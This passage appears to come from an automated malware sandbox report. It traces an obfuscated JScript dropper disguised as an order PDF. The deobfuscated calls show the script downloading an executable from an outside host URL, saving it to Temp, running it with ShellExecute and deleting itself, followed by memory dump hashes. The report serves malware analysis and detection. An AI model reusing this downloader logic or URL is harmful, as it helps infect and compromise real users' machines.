161	function () {	_0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB _0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0 _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0 _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0 _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0 _0x3974() ➔ uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB,dXnloCodW7pcV8k0
162	return _0x42fe7d;
163	};
164	return _0x3974 ( );	_0x3974() ➔ dXnloCodW7pcV8k0,uqtdR8kPceWHW5tdNW,ShellExecute,toString,hCk4E8oCkIHCnJf3gqyrWO/cGI80ewO1W54Gy2BdRt3dGmof,WOqoW6PSsSoAc0BdH0GfCq,279BGVghm,WQLhE3xcLSkBWQ5naCorW6xdUq,bYVcLCkh,uSkzW6xdIW,ECoyWQGeWQzGhSkBtMlcPW,RzXUsr,W4SFgdRcImkKWOiD,abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,w1vrmSoRW7VdJCkJWOVdGaldVq,WQtdNh4FpYK,AJirxSkZWOCCya9JWPhdJG,shift,WPBcTCoPW5misfRdSN7dL8oPbq,W4BcISoRW5qtgXxcIx3cPCog,EMpdGSkmdSoXsCk+W6u,428748eDivLq,q2iIW7/cNf9lcq/cV8k6WOb2,fromCharCode,vUkl,ksRdUCk9FSoRWOxcRCoVrsJdTd3dMuXWWOJdRmo+W4PIiZNdHCoUp8kjW7FdTSkaW4z6WRhcUwaO,length,WOVdSmovWONdJZGXzKNdMfxcOmo2rq,Bhsp,4(*W,qCVKfY,WRNdUKyZlrG,W5pdICkQkCk1WQ53WQZdRCo6tSoA,W6LlWOT6F3X+W7JdK8od,DeleteFile,W4ZdJrRdRue,421620Dulpsf,282elZIVv,W6JcQSofWRK,Scripting.FileSystemObject,BQ9o,1268392teACcP,Send,WPtdR14Ihq9nfCkFdKFcSCoRW7ddMeKt,AXxcQSkOWRG,WOZcHCkvkCo+WOXZnuxcKKbM,W4yuy1BdPSoFWOOIgCo6qge,bs19WQHMoNZdH8oAW5eX,W69VWRvm,10MQXdOq,AJ3cTmowW6WowIz1WO5WW4O,WR8BoCkPbXTiCCo9cW,WQ3cNSkvBW,8ApAyti,WQquW65/F8ol,W)L8,https://tgc8x.tk/tt/VNZVNCXKKJSF.exe,A1dcS8k4WPddG8kRWRq2W5j8FJmjumkfhSkMwmoDcCorW6rjW7tdNrW,WPRdHSkOWQrddhC,charCodeAt,push,76392yWuOtG,W73dVr7dRxtcHSkIW4xcK27cLSoWWOa,5991OPUtAM,13285611Ofkcqp,ScriptFullName,Position,nmkoFSotW53cKq,yxSPWPPSBJW,AJCsxmk1WOXXxYPeWPJdSmoB
165	}
166	Stream[_0x445216 ( 0xcd, '^pwq' ) ] ( ), Stream[_0x115fc7 ( 0x88 ) ] = 0x1, Stream[_0x445216 ( 0xf1, 'h2t$' ) ] ( Object['ResponseBody'] ), Stream[_0x115fc7 ( 0x90 ) ] = 0x0, Stream[_0x115fc7 ( 0x7c ) ] ( pOut, 0x2 ), Stream[_0x445216 ( 0xe8, 'zn0Y' ) ] ( ), new ActiveXObject ( _0x115fc7 ( 0x6e ) ) [_0x56566c ( 0x10d ) ] ( pOut, '', '', _0x155c25 ( 0x7d, 'vUkl' ), '1' ), new ActiveXObject ( _0x155c25 ( 0x77, _0x445216 ( 0xf5, 'J(3^' ) ) ) [_0x115fc7 ( 0x76 ) ] ( WScript[_0x56566c ( 0x106 ) ] );	_0x445216(205,"^pwq") ➔ "Open" Open() ➔ undefined _0x115fc7(136) ➔ "Type" _0x445216(241,"h2t$") ➔ "Write" Write() ➔ undefined _0x115fc7(144) ➔ "Position" _0x115fc7(124) ➔ "SaveToFile" SaveToFile("C:\Users\engineer\AppData\Local\Temp\VNZVNCXKKJSF.exe",2) ➔ undefined _0x445216(232,"zn0Y") ➔ "Close" Close() ➔ undefined _0x115fc7(110) ➔ "Shell.Application" _0x56566c(269) ➔ "ShellExecute" _0x155c25(125,"vUkl") ➔ "open" ShellExecute("C:\Users\engineer\AppData\Local\Temp\VNZVNCXKKJSF.exe","","","open","1") ➔ undefined _0x445216(245,"J(3^") ➔ "UEHS" _0x155c25(119,"UEHS") ➔ "Scripting.FileSystemObject" _0x115fc7(118) ➔ "DeleteFile" _0x56566c(262) ➔ "ScriptFullName" DeleteFile("C:\Users\engineer\Desktop\Order Specifications PDF.js") ➔ undefined

Reset < >

Analysis Process: powershell.exePID: 5224, Parent PID: 5516COMMON

Executed Functions

Function 02D1D758 Relevance: 2.1, Strings: 1, Instructions: 890COMMON

Download Yara Rule

Strings

k, xrefs: 02D1D9CF

Memory Dump Source

Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd

Similarity

API ID:
String ID: k
API String ID: 0-1164933156
Opcode ID: a2acfe275fe4ae5fc98489c2270c0b5bc341df9c4ec618926d016bdfbd6323e3
Instruction ID: b0f0f4939bd45d0e1681f96d0acd320712a38549c2500a3bb1be4dcbba050b1a
Opcode Fuzzy Hash: a2acfe275fe4ae5fc98489c2270c0b5bc341df9c4ec618926d016bdfbd6323e3
Instruction Fuzzy Hash: 1F826930A002198FDB64DF64D894BAEB7F2AF88304F1185A9D50AEB754DF34AD42CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02DBAAD8 Relevance: .7, Instructions: 658COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.628240669.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2db0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a814ae080dd01611da15f9238d4ebdc12360e3d70c02a44e9cfafade534eab0
Instruction ID: 9e552b985f5c71937ea8c17e4c416bab9f144eeabf35305cfd71cffda3de858f
Opcode Fuzzy Hash: 2a814ae080dd01611da15f9238d4ebdc12360e3d70c02a44e9cfafade534eab0
Instruction Fuzzy Hash: CD426B34B00204DFDB15DFA4D8A4BAE77B6BF88308F148469E9069B3A4DB75ED45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02D15A38 Relevance: .6, Instructions: 599COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2d10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adcd800e3167d2b6f28e20d533b9c9f6a1c284d4e9e8b5cfa76c033611a709eb
Instruction ID: 602037105a86756bee438ffa11a0c656dd8ad473971d52468ba7504245d9c6c6
Opcode Fuzzy Hash: adcd800e3167d2b6f28e20d533b9c9f6a1c284d4e9e8b5cfa76c033611a709eb
Instruction Fuzzy Hash: F5229D74B002059FDB14EBB4E854AAEB7F2EFC8204B15842AD906DB754DF35EC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02D163D8 Relevance: .6, Instructions: 581COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.626756317.0000000002D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false

Joe Sandbox IDA Plugin

